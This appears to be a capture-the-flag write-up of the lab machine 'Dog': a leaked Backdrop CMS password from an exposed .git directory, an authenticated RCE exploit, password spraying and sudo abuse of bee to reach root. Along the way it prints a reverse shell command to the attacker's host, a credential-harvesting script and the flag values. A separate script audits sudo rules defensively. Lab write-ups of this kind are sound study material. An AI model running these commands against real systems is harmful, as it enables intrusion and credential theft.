Proof of Concept
10.129.1.13
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Initial Access
- The site runs Backdrop CMS, for which a public authenticated RCE exists; the rest of this section is about recovering valid credentials so that it can be used
nmap script
- Exposed .git directory found
┌──(kali㉿kali)-[~/Dog]
└─$ sudo nmap 10.129.1.13 --open --min-rate 3000 -oN scan -sCV -p80
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-26 03:30 EST
Nmap scan report for 10.129.1.13
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Home | Dog
| http-git:
| 10.129.1.13:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply

Dump the Git directory
┌──(kali㉿kali)-[~/Dog/git_dump]
└─$ git-dumper http://10.129.1.13/.git/ .
[-] Testing http://10.129.1.13/.git/HEAD [200]
[-] Testing http://10.129.1.13/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.129.1.13/.git/ [200]
[-] Fetching http://10.129.1.13/.gitignore [404]
[-] http://10.129.1.13/.gitignore responded with status code 404
[-] Fetching http://10.129.1.13/.git/objects/ [200]
[-] Fetching http://10.129.1.13/.git/COMMIT_EDITMSG [200]
[-] Fetching http://10.129.1.13/.git/logs/ [200]
[-] Fetching http://10.129.1.13/.git/branches/ [200]
[-] Fetching http://10.129.1.13/.git/description [200]
[-] Fetching http://10.129.1.13/.git/HEAD [200]
<SNIP>
[-] Fetching http://10.129.1.13/.git/objects/ff/c418375000d182c805974f2d004e92257178d8 [200]
[-] Fetching http://10.129.1.13/.git/objects/ff/d522e1da8660cb25dce831f19efa284753b691 [200]
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 2873 paths from the index

MySQL credentials found in settings.php inside the dumped Git repository
- root:BackDropJ2024DS2024
┌──(kali㉿kali)-[~/Dog/git_dump]
└─$ cat settings.php
<?php
/**
* @file
* Main Backdrop CMS configuration file.
*/
/**
* Database configuration:
*
* Most sites can configure their database by entering the connection string
* below. If using primary/replica databases or multiple connections, see the
* advanced database documentation at
* https://api.backdropcms.org/database-configuration
*/
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
$database_prefix = '';

Usernames found in the Git repository (reflog author and exported config)
┌──(kali㉿kali)-[~/Dog/git-dumper]
└─$ grep -i -r dog.htb .
./.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "tiffany@dog.htb"

Web login succeeded with the recovered credentials: the MySQL password is reused for the tiffany CMS account
- tiffany:BackDropJ2024DS2024
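Added example (Python; not part of this writeup, the exploit repository, or Backdrop CMS) that automates the two steps above: parsing the $database connection string out of settings.php, harvesting addresses under the target domain from everything in the dump, and pairing the local-parts with the leaked password as spray candidates. The dump is represented as an in-memory path-to-content dict built from the fragments shown on this page; the update_emails key in the JSON is assumed, and the domain dog.htb is passed in rather than discovered.

```python
import re
from urllib.parse import urlsplit

# Constructed stand-in for the dumped repository (path -> content). The fragments
# reproduce what the page shows; the JSON key name "update_emails" is assumed.
DUMPED_FILES = {
    "settings.php": (
        "<?php\n"
        "$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';\n"
        "$database_prefix = '';\n"
    ),
    ".git/logs/HEAD": (
        "0000000000000000000000000000000000000000 "
        "8204779c764abd4c9d8d95038b6d22b6a7515afa "
        "root <dog@dog.htb> 1738963331 +0000\tcommit (initial): todo: customize url aliases. "
        "reference:https://docs.backdropcms.org/documentation/url-aliases\n"
    ),
    "files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json": (
        '{"update_emails": ["tiffany@dog.htb"]}\n'
    ),
}

# Backdrop stores its DB connection as a URL in $database (see settings.php above).
DB_URL_RE = re.compile(r"""\$database\s*=\s*['"]([a-z0-9+.-]+://[^'"]+)['"]""")
# Alphabetic TLD required, so "user:pass@127.0.0.1" in the DB URL is not taken for an address.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}")


def parse_backdrop_db_credentials(settings_php):
    """Return user/password/host/database from Backdrop's $database string, or None."""
    m = DB_URL_RE.search(settings_php)
    if not m:
        return None
    u = urlsplit(m.group(1))
    return {"scheme": u.scheme, "user": u.username, "password": u.password,
            "host": u.hostname, "database": u.path.lstrip("/")}


def harvest_identities(files, domain):
    """Map every address under `domain` to the dumped files it appears in
    (reflogs, exported config, anything else): a structured `grep -r dog.htb`."""
    suffix = "@" + domain.lower()
    found = {}
    for path, content in files.items():
        for email in EMAIL_RE.findall(content):
            if email.lower().endswith(suffix):
                found.setdefault(email.lower(), set()).add(path)
    return found


def spray_candidates(files, domain):
    """Pair each harvested local-part with the leaked DB password: the password
    reuse hypothesis this writeup confirms with tiffany:BackDropJ2024DS2024."""
    creds = parse_backdrop_db_credentials(files["settings.php"])
    if creds is None or not creds["password"]:
        return []
    users = sorted(e.split("@", 1)[0] for e in harvest_identities(files, domain))
    return [(u, creds["password"]) for u in users]


if __name__ == "__main__":
    print(parse_backdrop_db_credentials(DUMPED_FILES["settings.php"]))
    for email, paths in sorted(harvest_identities(DUMPED_FILES, "dog.htb").items()):
        print(email, sorted(paths))
    print(spray_candidates(DUMPED_FILES, "dog.htb"))
```

Running it lists root:BackDropJ2024DS2024 for the database, dog@dog.htb from the reflog and tiffany@dog.htb from the exported config, and the candidate pairs dog and tiffany with the DB password. Restricting the address pattern to alphabetic TLDs is what keeps the user:pass@127.0.0.1 part of the connection URL from being picked up as an identity.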
Download the PoC
┌──(kali㉿kali)-[~/Dog]
└─$ git clone https://github.com/rvizx/backdrop-rce
Cloning into 'backdrop-rce'...
remote: Enumerating objects: 11, done.
remote: Counting objects: 100% (11/11), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 11 (delta 1), reused 4 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (11/11), 5.15 KiB | 2.57 MiB/s, done.
Resolving deltas: 100% (1/1), done.

If the PoC runs successfully, Linux commands can be executed on the target
┌──(kali㉿kali)-[~/Dog/backdrop-rce]
└─$ python exploit.py http://10.129.1.13 tiffany BackDropJ2024DS2024
[>] logging in as user: 'tiffany'
[>] login successful
[>] enabling maintenance mode
[>] maintenance enabled
[>] payload archive: /tmp/bd_x3qrlh_j/rvz2be891.tgz
[>] fetching installer form
[>] uploading payload (bulk empty)
[>] initial upload post complete
[>] batch id = 13; sending authorize ‘do_nojs’ and ‘do’
[>] waiting for shell at: http://10.129.1.13/modules/rvz2be891/shell.php
[>] shell is live
[>] interactive shell – type 'exit' to quit
kali@10.129.1.13 >

Run a reverse shell command to obtain a full shell
kali@10.129.1.13 > bash -c "sh -i >& /dev/tcp/10.10.14.17/4444 0>&1"

Reverse shell connection established
┌──(kali㉿kali)-[~/Dog]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.1.13] 44836
sh: 0: can't access tty; job control turned off
$

Lateral Movement
Enumerate users from the home directory
- jobert
- johncusack
www-data@dog:/var/www/html/modules$ cd /home
cd /home
www-data@dog:/home$ ls -al
ls -al
total 16
drwxr-xr-x 4 root root 4096 Aug 15 2024 .
drwxr-xr-x 19 root root 4096 Feb 7 2025 ..
drwxr-xr-x 4 jobert jobert 4096 Feb 7 2025 jobert
drwxr-xr-x 3 johncusack johncusack 4096 Feb 7 2025 johncusack

Password spray against the local users with the previously recovered password
- Authentication succeeded as johncusack:BackDropJ2024DS2024
┌──(kali㉿kali)-[~/Dog]
└─$ cat users.txt
jobert
johncusack
┌──(kali㉿kali)-[~/Dog]
└─$ nxc ssh 10.129.1.13 -u users.txt -p 'BackDropJ2024DS2024' --continue-on-success -t 100
SSH 10.129.1.13 22 10.129.1.13 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.12
SSH 10.129.1.13 22 10.129.1.13 [-] jobert:BackDropJ2024DS2024
SSH 10.129.1.13 22 10.129.1.13 [+] johncusack:BackDropJ2024DS2024 Linux - Shell access!

SSH access
┌──(kali㉿kali)-[~/Dog]
└─$ sshpass -p 'BackDropJ2024DS2024' ssh johncusack@10.129.1.13
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
<SNIP>
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Tue Mar 4 17:04:29 2025 from 10.10.14.17
johncusack@dog:~$

Read user.txt
johncusack@dog:~$ cat user.txt
91feb60c2eb6c5a67c87f2e82f04a17b
johncusack@dog:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.1.13 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 fe80::250:56ff:feb0:9763 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb0:9763 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b0:97:63 txqueuelen 1000 (Ethernet)
RX packets 35499 bytes 3551848 (3.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 16240 bytes 19498622 (19.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 43790 bytes 47425142 (47.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 43790 bytes 47425142 (47.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Privilege Escalation
Check which commands can be run with sudo
- /usr/local/bin/bee (Backdrop's command-line tool) can be run as any user, including root
johncusack@dog:~$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/bee

Obtain a root shell with bee: its eval subcommand executes arbitrary PHP, so system('/bin/bash') spawns a shell as root (--root points bee at the Backdrop installation)
johncusack@dog:~$ sudo /usr/local/bin/bee --root=/var/www/html eval "system('/bin/bash');"
root@dog:/var/www/html#

Read root.txt
root@dog:~# cat root.txt
dd98188e9126c9238cc8a1a0fc670fd4
root@dog:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.1.13 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 fe80::250:56ff:feb0:9763 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb0:9763 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b0:97:63 txqueuelen 1000 (Ethernet)
RX packets 36821 bytes 3644206 (3.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 16536 bytes 19526122 (19.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 44218 bytes 47532523 (47.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 44218 bytes 47532523 (47.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
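Added example (Python; not the machine's, Backdrop's or bee's own code) that parses sudo -l output and flags rules amounting to a root shell, such as the bee rule in the Privilege Escalation section above: any binary that evaluates caller-supplied code or spawns a shell is as good as ALL once it can be run as root. Input is the constructed sudo -l text from this page plus a hypothetical narrowly scoped rule (user bob, host web01) for contrast; the list of code-executing binaries is illustrative, not exhaustive.

```python
import posixpath
import re

# Constructed sample input: the `sudo -l` output shown on this page for johncusack.
SUDO_L_DOG = r"""Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
"""

# Constructed contrast case (hypothetical host and user): a rule scoped to one action.
SUDO_L_BENIGN = r"""User bob may run the following commands on web01:
    (root) NOPASSWD: /usr/sbin/apachectl graceful
"""

# Binaries that run caller-supplied code or spawn a shell as part of their normal
# function. `bee` is listed because `bee eval` executes arbitrary PHP.
# Assumption: an illustrative list, not an exhaustive one.
CODE_EXEC_BINARIES = {
    "bee", "drush", "php", "python", "python3", "perl", "ruby", "node",
    "bash", "sh", "dash", "zsh", "vim", "vi", "less", "more", "find", "env", "awk",
}

# "(runas) [TAG: ...] command", as printed by sudo -l.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")


def parse_sudo_rules(text):
    """Return (runas, tags, command) triples from the 'may run the following commands' block."""
    rules = []
    in_block = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_block = True
            continue
        if not in_block:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # sudo -l can list several commands on one line separated by ", ".
        for cmd in m.group("cmd").split(", "):
            rules.append((m.group("runas").strip(), m.group("tags").strip(), cmd.strip()))
    return rules


def audit_sudo(text):
    """Flag rules that give the caller an unrestricted shell as the run-as user."""
    findings = []
    for runas, tags, cmd in parse_sudo_rules(text):
        name = posixpath.basename(cmd.split()[0])
        if cmd == "ALL":
            reason = "any command permitted"
        elif name in CODE_EXEC_BINARIES:
            reason = f"{name} executes caller-supplied code or spawns a shell"
        else:
            continue
        findings.append({
            "runas": runas,
            "command": cmd,
            "nopasswd": "NOPASSWD:" in tags,
            "reason": reason,
        })
    return findings


if __name__ == "__main__":
    for finding in audit_sudo(SUDO_L_DOG):
        print(finding)
    print(audit_sudo(SUDO_L_BENIGN))
```

On the text from this box the audit returns a single finding for /usr/local/bin/bee with run-as ALL : ALL and no NOPASSWD tag, which is exactly the rule that was turned into a root shell above; the apachectl rule produces nothing. The same parser also handles the comma-separated command lists and NOPASSWD/SETENV tags that sudo -l prints on hardened hosts.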